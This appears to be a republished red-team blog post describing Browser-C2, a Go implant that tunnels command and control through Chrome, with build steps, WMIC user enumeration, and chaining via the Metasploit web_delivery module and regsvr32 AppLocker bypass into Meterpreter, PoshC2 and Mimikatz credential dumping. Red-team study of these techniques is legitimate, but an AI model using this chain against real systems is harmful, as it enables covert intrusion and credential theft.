Red Teams are always focused in the discovery of innovative ways to establish connections back to their and infrastructure. The main reasons that leads red teams to use standard protocols or native system functionality for command and operations is to bypass some sort of restrictions and to stay of the radar of the blue team.  0x09AL developed Browser-C2 in Go which uses the (Chrome) as a communication channel and can bypass host based firewalls. 0x09AL described the idea and the operation of the tool in his blog.

The tool requires the following two components in order to operate successfully.

go get -u github.com/gorilla/mux
go get -u github.com/chzyer/readline

The implant can be compiled to executable with the following command. However prior to that activity the agent.go file needs to be changed to contain the IP address of the C2 server.

go build agent.go
Browser C2 - Converting the implant to exe  - browser c2 converting the implant to exe - Command and Control – Browser

Browser C2 – Converting the implant to executable

The jquery file needs to modified to contain the IP of the command and control server in the var url parameter.

Browser C2 - jquery Configuration  - browser c2 jquery configuration - Command and Control – Browser

The main command and control application can be compiled with the following:

go build

When the implant will executed on the target host Chrome browser will initiate and automatically will reach the Command and Control server endpoint.

Browser C2 - Agent Execution  - browser c2 agent execution - Command and Control – Browser

Browser C2 – Agent Execution

A connection will establish with the C2 server and commands can be executed to retrieve host information.

Browser C2 - Command Execution  - browser c2 command execution - Command and Control – Browser

Browser C2 – Command Execution

The Windows Management Instrumentation command line utility can be also used for additional host recon.

wmic useraccount list full
Browser C2 - User Enumeration via WMIC  - browser c2 user enumeration via wmic - Command and Control – Browser

Browser C2 – User Enumeration via WMIC

Browser-C2 doesn’t support encryption for communication between the server and the compromised host and has limited functionality since it cannot execute PowerShell scripts  and it can only used for basic command execution. For additional operations an alternative channel such as Meterpeter or PoshC2 can be considered. The Metasploit Framework module web delivery will generate and host a scriptlet automatically.

exploit/multi/script/web_delivery
Browser C2 - Metasploit Web Delivery Module  - browser c2 metasploit web delivery module - Command and Control – Browser

Browser C2 – Metasploit Web Delivery Module

The regsvr32 is a common method discovered by Casey Smith which bypasses AppLocker policies and it is a reliable technique to execute arbitrary code remotely. The scriptlet can be executed from an existing Browser-C2 agent session.

Browser C2 - Code Execution via regsvr32 Metasploit  - browser c2 code execution via regsvr32 metasploit - Command and Control – Browser

Browser C2 – Code Execution via regsvr32 Metasploit

When the payload will delivered a Meterpreter session will open which will provide enhanced capabilities.

Browser C2 - Meterpreter via Web Delivery  - browser c2 meterpreter via web delivery - Command and Control – Browser

Browser C2 – Meterpreter via Web Delivery

Usage of the same method can also establish a connection with PoshC2 for post-exploitation activities based in PowerShell.

Browser C2 - Code Execution via regsvr32 PoshC2  - browser c2 code execution via regsvr32 poshc2 - Command and Control – Browser

Browser C2 – Code Execution via regsvr32 for PoshC2

The implant handler of PoshC2 will receive the connection.

Browser C2 - Implant Handler  - browser c2 implant handler - Command and Control – Browser

PoshC2 – Implant Handler

Interaction with the implant will start by selecting the associated ID. PoshC2 contains various PowerShell modules which can be used for extensive host recon credential grabbing like Mimikatz.

Browser C2 - Mimikatz via Implant Handler  - browser c2 mimikatz via implant handler - Command and Control – Browser

Browser C2 – Mimikatz via Implant Handler

Mimikatz output will appear in the PoshC2 console.

Browser C2 - Mimikatz PoshC2  - browser c2 mimikatz poshc2 - Command and Control – Browser

Browser C2 – Mimikatz PoshC2

References





Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here